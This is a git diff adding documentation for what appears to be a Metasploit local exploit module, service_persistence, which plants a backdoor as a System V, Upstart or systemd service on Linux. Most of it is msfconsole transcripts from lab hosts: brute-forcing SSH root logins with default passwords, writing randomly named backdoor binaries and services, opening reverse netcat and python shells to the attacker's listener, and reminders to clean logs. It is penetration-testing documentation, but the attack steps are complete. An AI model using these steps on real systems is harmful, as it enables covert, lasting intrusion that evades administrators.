sempervictus
diff --git a/‎documentation/modules/exploit/linux/local/service_persistence.md
Lines changed: 254 additions & 0 deletions b/‎documentation/modules/exploit/linux/local/service_persistence.md
Lines changed: 254 additions & 0 deletions
@@ -0,0 +1,254 @@
+### Creating A Testing Environment
+
+  This module has been tested against:
+
+1. Kali 2.0 (System V)
+2. Ubuntu 14.04 (Upstart)
+3. Ubuntu 16.04 (systemd)
+4. Centos 5 (System V)
+5. Fedora 18 (systemd)
+6. Fedora 20 (systemd)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  3. Do: `use exploit/linux/local/service_persistence`
+  4. Do: `set session #`
+  5. Do: `set verbose true`
+  6. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system.
+  7. Optional Do: `set SHELLAPTH /bin` if needed for compatibility on remote system.
+  8. Do: `set lhost`
+  9. Do: `exploit`
+  10. Do: `use exploit/multi/handler`
+  11. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system.
+  12. Do: `set lhost`
+  13. Do: `exploit -j`
+  14. Kill your shell (if System V, reboot target).  Upstart/systemd wait 10sec
+  15. Get Shell
+
+## Options
+
+**target**
+
+  There are several targets selectable, which all have their own issues.
+
+0. Automatic: Detect the service handler automatically based on running `which` to find the admin binaries
+1. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot).  This logs to syslog or /var/log/<process>.log and .err
+2. Upstart: Logs to its own file.  This module is set to restart the shell after a 10sec pause, and do this forever.
+3. systemd: This module is set to restart the shell after a 10sec pause, and do this forever.
+
+**SHELLPATH**
+  
+  If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here.  Default is /usr/local/bin
+
+**SERVICE**
+
+  The name of the service to create.  If not chosen, a 7 character random one is created.
+
+**SHELL_NAME**
+
+  The name of the file to write with our shell.  If not chosen, a 5 character random one is created.
+
+## Scenarios
+
+### System V (Centos 5 - root - chkconfig)
+
+Get initial access
+
+    msf > use auxiliary/scanner/ssh/ssh_login
+    msf auxiliary(ssh_login) > set rhosts 192.168.199.131
+    rhosts => 192.168.199.131
+    msf auxiliary(ssh_login) > set username root
+    username => root
+    msf auxiliary(ssh_login) > set password centos
+    password => centos
+    msf auxiliary(ssh_login) > exploit
+    
+    [*] 192.168.199.131:22 SSH - Starting bruteforce
+    [+] 192.168.199.131:22 SSH - Success: 'root:centos' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:51:48 EDT 2014 i686 i686 i386 GNU/Linux '
+    [*] Command shell session 1 opened (192.168.199.128:49359 -> 192.168.199.131:22) at 2016-06-22 14:27:38 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+
+Install our callback service (system_v w/ chkconfig).  Note we change SHELLPATH since /usr/local/bin isnt in the path for CentOS 5 services.
+
+    msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
+    msf exploit(service_persistence) > set session 1
+    session => 1
+    msf exploit(service_persistence) > set verbose true
+    verbose => true
+    msf exploit(service_persistence) > set SHELLPATH /bin
+    SHELLPATH => /bin
+    msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
+    payload => cmd/unix/reverse_netcat
+    msf exploit(service_persistence) > set lhost 192.168.199.128
+    lhost => 192.168.199.128
+    msf exploit(service_persistence) > exploit
+    
+    [*] Started reverse handler on 192.168.199.128:4444 
+    [*] Writing backdoor to /bin/GUIJc
+    [*] Max line length is 65537
+    [*] Writing 95 bytes in 1 chunks of 329 bytes (octal-encoded), using printf
+    [*] Utilizing System_V
+    [*] Utilizing chkconfig
+    [*] Writing service: /etc/init.d/HqdezBF
+    [*] Max line length is 65537
+    [*] Writing 1825 bytes in 1 chunks of 6409 bytes (octal-encoded), using printf
+    [*] Enabling & starting our service
+    [*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.131:56182) at 2016-06-22 14:27:50 -0400
+
+Reboot the box to prove persistence
+
+    reboot
+    ^Z
+    Background session 2? [y/N]  y
+    msf exploit(service_persistence) > use exploit/multi/handler
+    msf exploit(handler) > set payload cmd/unix/reverse_netcat
+    payload => cmd/unix/reverse_netcat
+    msf exploit(handler) > set lhost 192.168.199.128
+    lhost => 192.168.199.128
+    msf exploit(handler) > exploit
+    
+    [*] Started reverse handler on 192.168.199.128:4444 
+    [*] Starting the payload handler...
+    [*] Command shell session 3 opened (192.168.199.128:4444 -> 192.168.199.131:44744) at 2016-06-22 14:29:32 -0400
+
+
+### Upstart (Ubuntu 14.04.4 Server - root)
+Of note, I allowed Root login via SSH w/ password only to gain easy initial access
+
+Get initial access
+
+    msf auxiliary(ssh_login) > exploit
+    
+    [*] 10.10.60.175:22 SSH - Starting bruteforce
+    [+] 10.10.60.175:22 SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:27 UTC 2016 i686 i686 i686 GNU/Linux '
+    [*] Command shell session 1 opened (10.10.60.168:43945 -> 10.10.60.175:22) at 2016-06-22 08:03:15 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+
+Install our callback service (Upstart)
+
+    msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
+    msf exploit(service_persistence) > set session 1
+    session => 1
+    msf exploit(service_persistence) > set verbose true
+    verbose => true
+    msf exploit(service_persistence) > set payload cmd/unix/reverse_python
+    payload => cmd/unix/reverse_python
+    msf exploit(service_persistence) > set lhost 10.10.60.168
+    lhost => 10.10.60.168
+    msf exploit(service_persistence) > exploit
+    
+    [*] Started reverse handler on 10.10.60.168:4444 
+    [*] Writing backdoor to /usr/local/bin/bmmjv
+    [*] Max line length is 65537
+    [*] Writing 429 bytes in 1 chunks of 1650 bytes (octal-encoded), using printf
+    [*] Utilizing Upstart
+    [*] Writing /etc/init/Hipnufl.conf
+    [*] Max line length is 65537
+    [*] Writing 236 bytes in 1 chunks of 874 bytes (octal-encoded), using printf
+    [*] Starting service
+    [*] Dont forget to clean logs: /var/log/upstart/Hipnufl.log
+    [*] Command shell session 5 opened (10.10.60.168:4444 -> 10.10.60.175:44368) at 2016-06-22 08:23:46 -0400
+
+And now, we can kill the callback shell from our previous session
+
+    ^Z
+    Background session 5? [y/N]  y
+    msf exploit(service_persistence) > sessions -i 1
+    [*] Starting interaction with 1...
+    
+    netstat -antp | grep 4444
+    tcp        0      0 10.10.60.175:44368      10.10.60.168:4444       ESTABLISHED 1783/bash
+    tcp        0      0 10.10.60.175:44370      10.10.60.168:4444       ESTABLISHED 1789/python
+    kill 1783
+    [*] 10.10.60.175 - Command shell session 5 closed.  Reason: Died from EOFError
+    kill 1789
+
+Now with a multi handler, we can catch Upstart restarting the process every 10sec
+
+    msf > use exploit/multi/handler 
+    msf exploit(handler) > set payload cmd/unix/reverse_python
+    payload => cmd/unix/reverse_python
+    msf exploit(handler) > set lhost 10.10.60.168
+    lhost => 10.10.60.168
+    msf exploit(handler) > exploit
+    
+    [*] Started reverse handler on 10.10.60.168:4444 
+    [*] Starting the payload handler...
+    [*] Command shell session 3 opened (10.10.60.168:4444 -> 10.10.60.175:44390) at 2016-06-22 08:26:48 -0400
+
+
+### systemd (Ubuntu 16.04 Server - root)
+Ubuntu 16.04 doesn't have many of the default shell options, however `cmd/unix/reverse_netcat` works.
+While python shellcode works on previous sytems, on 16.04 the path is `python3`, and therefore `python` will fail the shellcode.
+
+Get initial access
+
+    msf exploit(handler) > use exploit/linux/local/service_persistence
+    msf exploit(service_persistence) > set session 1
+    session => 1
+    msf exploit(service_persistence) > set verbose true
+    verbose => true
+    msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
+    payload => cmd/unix/reverse_netcat
+    msf exploit(service_persistence) > set lhost 192.168.199.128
+    lhost => 192.168.199.128
+    msf exploit(service_persistence) > exploit
+    
+    [*] Started reverse handler on 192.168.199.128:4444 
+    [*] Writing backdoor to /usr/local/bin/JSRCF
+    [*] Max line length is 65537
+    [*] Writing 103 bytes in 1 chunks of 361 bytes (octal-encoded), using printf
+    [*] Utilizing systemd
+    [*] /lib/systemd/system/YelHpCx.service
+    [*] Max line length is 65537
+    [*] Writing 151 bytes in 1 chunks of 579 bytes (octal-encoded), using printf
+    [*] Enabling service
+    [*] Starting service
+    [*] Command shell session 7 opened (192.168.199.128:4444 -> 192.168.199.130:47050) at 2016-06-22 10:35:07 -0400
+    
+    ^Z
+    Background session 7? [y/N]  y
+
+Kill the process on the Ubuntu target box via local access #good_admin
+
+    root@ubuntu:/etc/systemd/system/multi-user.target.wants# netstat -antp | grep 4444
+    tcp        0      0 192.168.199.130:47052   192.168.199.128:4444    ESTABLISHED 5632/nc
+    root@ubuntu:/etc/systemd/system/multi-user.target.wants# kill 5632
+
+And logically, we lose our shell
+
+     [*] 192.168.199.130 - Command shell session 7 closed.  Reason: Died from EOFError
+
+Now with a multi handler, we can catch systemd restarting the process every 10sec
+
+
+    msf exploit(service_persistence) > use exploit/multi/handler 
+    msf exploit(handler) > show options
+
+    Module options (exploit/multi/handler):
+
+     Name  Current Setting  Required  Description
+     ----  ---------------  --------  -----------
+    
+    Payload options (cmd/unix/reverse_netcat):
+
+     Name   Current Setting  Required  Description
+     ----   ---------------  --------  -----------
+     LHOST  192.168.199.128  yes       The listen address
+     LPORT  4444             yes       The listen port
+
+    Exploit target:
+
+     Id  Name
+     --  ----
+     0   Wildcard Target
+
+    msf exploit(handler) > exploit
+
+    [*] Started reverse handler on 192.168.199.128:4444 
+    [*] Starting the payload handler...
+    [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400